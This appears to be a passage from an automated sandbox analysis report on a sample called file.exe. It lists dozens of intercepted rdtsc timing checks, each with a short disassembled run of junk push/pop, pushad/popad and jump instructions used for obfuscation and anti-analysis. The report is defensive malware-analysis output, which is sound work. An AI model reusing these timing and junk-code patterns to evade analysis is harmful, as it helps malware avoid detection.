              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1512C second address: F15136 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD0F second address: F1FD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD15 second address: F1FD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD1B second address: F1FD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F6E390E37E6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD28 second address: F1FD49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E067h 0x00000007 jp 00007F6E3947E056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD49 second address: F1FD5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E390E37EAh 0x00000009 jo 00007F6E390E37E6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F45C second address: F1F471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F6E3947E05Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F6F6 second address: F1F71E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E390E37E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6E390E37F2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F6E390E37E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F71E second address: F1F722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F722 second address: F1F728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21371 second address: F21375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21375 second address: F2137B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2137B second address: F2138C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6E3947E056h 0x00000009 jl 00007F6E3947E056h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2138C second address: F213A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jng 00007F6E390E37E8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F6E390E3816h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F213A6 second address: F213BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E062h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F213BE second address: F213C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F213C4 second address: F213CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F269C1 second address: F269F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F6E390E37F9h 0x0000000c pop edx 0x0000000d jnc 00007F6E390E37EEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F269F9 second address: F26A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E31 second address: F27E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E36 second address: F27E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6E3947E056h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E40 second address: F27E73 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jns 00007F6E390E37F4h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6E390E37EBh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27E73 second address: F27EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E3947E066h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27EAA second address: F27EB4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2815D second address: F28171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2BBBE second address: F2BBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2BBC6 second address: F2BBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2BBCA second address: F2BBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C10F second address: F2C137 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b js 00007F6E3947E08Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F6E3947E063h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C268 second address: F2C28A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E390E37E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6E390E37F2h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C28A second address: F2C28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C28E second address: F2C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C6EB second address: F2C6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C6EF second address: F2C70B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F6h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C70B second address: F2C720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E3947E05Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C720 second address: F2C724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C724 second address: F2C746 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6E3947E05Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jnp 00007F6E3947E079h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2CA26 second address: F2CA2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2CA2C second address: F2CA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6E3947E05Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2CA44 second address: F2CA56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jne 00007F6E390E37EEh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2CD04 second address: F2CD08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2CD08 second address: F2CD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6E390E37EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F6E390E37E6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30113 second address: F30117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30117 second address: F30127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30127 second address: F3012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3012B second address: F3012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3012F second address: F30145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 jmp 00007F6E3947E05Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB74D8 second address: EB74DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB74DE second address: EB74F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E062h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35077 second address: F35087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6E390E37E6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3531F second address: F35327 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F359BA second address: F359C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F359C0 second address: F35A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 jmp 00007F6E3947E064h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6E3947E064h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6E3947E062h 0x0000001d jmp 00007F6E3947E05Fh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35B5E second address: F35B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35CEB second address: F35CFB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6E3947E056h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35CFB second address: F35D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35D01 second address: F35D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5947 second address: EB5970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37EEh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F6E390E37F5h 0x00000011 jmp 00007F6E390E37EFh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5970 second address: EB59B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E3947E05Dh 0x00000008 jmp 00007F6E3947E063h 0x0000000d ja 00007F6E3947E056h 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F6E3947E062h 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB59B7 second address: EB59BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB59BD second address: EB59C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB59C1 second address: EB59EA instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E390E37E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6E390E37F9h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3644E second address: F36453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39576 second address: F3957C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3957C second address: F39582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39582 second address: F395A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC23 second address: F3DC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFB8F9 second address: EE5BE9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E390E37E8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 call 00007F6E390E37F8h 0x00000015 sub ebx, dword ptr [ebp+122D2BB4h] 0x0000001b pop edx 0x0000001c cld 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp+1247F66Bh] 0x00000024 mov dword ptr [ebp+122D2F74h], ebx 0x0000002a nop 0x0000002b jmp 00007F6E390E37F5h 0x00000030 push eax 0x00000031 jnp 00007F6E390E37F2h 0x00000037 nop 0x00000038 js 00007F6E390E37FCh 0x0000003e jmp 00007F6E390E37F6h 0x00000043 call dword ptr [ebp+122D1E2Ch] 0x00000049 pushad 0x0000004a jmp 00007F6E390E37F2h 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pop esi 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF11 second address: EFBF24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF24 second address: EFBF6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F6E390E37E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 6A577E55h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F6E390E37E8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d add edi, dword ptr [ebp+122D29CCh] 0x00000033 call 00007F6E390E37E9h 0x00000038 jnp 00007F6E390E37F0h 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF6D second address: EFBF8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F6E3947E05Bh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F6E3947E068h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF8D second address: EFBF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF91 second address: EFBFBC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push esi 0x0000000d jng 00007F6E3947E058h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6E3947E05Fh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBFBC second address: EFBFC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC0AE second address: EFC0B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC48D second address: EFC492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC492 second address: EFC4DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F6E3947E058h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov di, 4882h 0x0000002a cmc 0x0000002b push 00000004h 0x0000002d mov di, E466h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jnp 00007F6E3947E056h 0x0000003d popad 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCBFC second address: EFCC0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F6E390E37E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCC0E second address: EFCC28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6E3947E063h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCC28 second address: EFCC2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCC2C second address: EFCC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov cx, bx 0x0000000b lea eax, dword ptr [ebp+1247F6AFh] 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F6E3947E058h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D30BDh], esi 0x00000031 push eax 0x00000032 pushad 0x00000033 push edx 0x00000034 push ecx 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCC70 second address: EE6776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F6E390E37E8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+1247F66Bh] 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F6E390E37E8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov edx, dword ptr [ebp+122D2A54h] 0x0000004d mov dword ptr [ebp+122D2217h], esi 0x00000053 nop 0x00000054 je 00007F6E390E37EAh 0x0000005a push ebx 0x0000005b push edi 0x0000005c pop edi 0x0000005d pop ebx 0x0000005e push eax 0x0000005f jmp 00007F6E390E37F3h 0x00000064 nop 0x00000065 jg 00007F6E390E37E6h 0x0000006b call dword ptr [ebp+122D19B2h] 0x00000071 push ebx 0x00000072 push edx 0x00000073 jnc 00007F6E390E37E6h 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3CD84 second address: F3CD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6E3947E056h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
